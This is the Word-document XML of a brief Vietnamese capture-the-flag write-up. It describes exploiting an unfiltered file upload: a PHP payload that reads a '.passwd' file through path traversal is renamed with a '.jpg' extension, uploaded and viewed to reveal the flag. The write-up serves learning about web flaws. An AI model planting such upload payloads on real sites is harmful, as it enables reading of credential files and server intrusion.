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3920" w14:textId="2538D280" w:rsidR="00C54FA4" w:rsidRDefault="00AD3CBB">
      <w:r>
        <w:t>Đầu tiên ta vào trang thì thấy phần upload không filter, ta sẽ tạo payload để tấn công</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439E1672" w14:textId="77777777" w:rsidR="00AD3CBB" w:rsidRDefault="00AD3CBB" w:rsidP="00AD3CBB">
      <w:r>
        <w:t>&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CFD979" w14:textId="77777777" w:rsidR="00AD3CBB" w:rsidRDefault="00AD3CBB" w:rsidP="00AD3CBB">
      <w:r>
        <w:t>echo file_get_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>contents(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>"../../../.passwd");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4C0E5A" w14:textId="2444DAD2" w:rsidR="00AD3CBB" w:rsidRDefault="00AD3CBB" w:rsidP="00AD3CBB">
      <w:r>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC9D7AC" w14:textId="741E30F2" w:rsidR="00AD3CBB" w:rsidRDefault="00AD3CBB" w:rsidP="00AD3CBB">
      <w:r>
        <w:t>Sau đó đổi tên file bằng thêm .jpg cuối</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF6D9E5" w14:textId="3BE7F344" w:rsidR="00AD3CBB" w:rsidRDefault="00AD3CBB" w:rsidP="00AD3CBB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C6C4C12" wp14:editId="3494643E">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="196386240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62404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1A6" w14:textId="49F5CE42" w:rsidR="00AD3CBB" w:rsidRDefault="00AD3CBB" w:rsidP="00AD3CBB">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Gửi payload và nhấn vào xem ảnh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75F69A1B" wp14:editId="280F921B">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="77121925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9256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E33D" w14:textId="32F7B0A0" w:rsidR="00AD3CBB" w:rsidRDefault="00AD3CBB" w:rsidP="00AD3CBB">
      <w:r>
        <w:t>Thì ta có được flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68045F61" w14:textId="77777777" w:rsidR="00AD3CBB" w:rsidRPr="00AD3CBB" w:rsidRDefault="00AD3CBB" w:rsidP="00AD3C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D3C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Gg9LRz-hWSxqqUKd77-_q-6G8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20114F1F" w14:textId="77777777" w:rsidR="00AD3CBB" w:rsidRDefault="00AD3CBB" w:rsidP="00AD3CBB"/>
    <w:sectPr w:rsidR="00AD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6D"/>
    <w:rsid w:val="007A546D"/>
    <w:rsid w:val="00AD3CBB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B1B3"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{C8ED2E70-2BDC-420A-A35E-E3FF1D4E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2023-04-15T14:41:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-04-15T14:43:00Z</dcterms:modified>
</cp:coreProperties>
</file>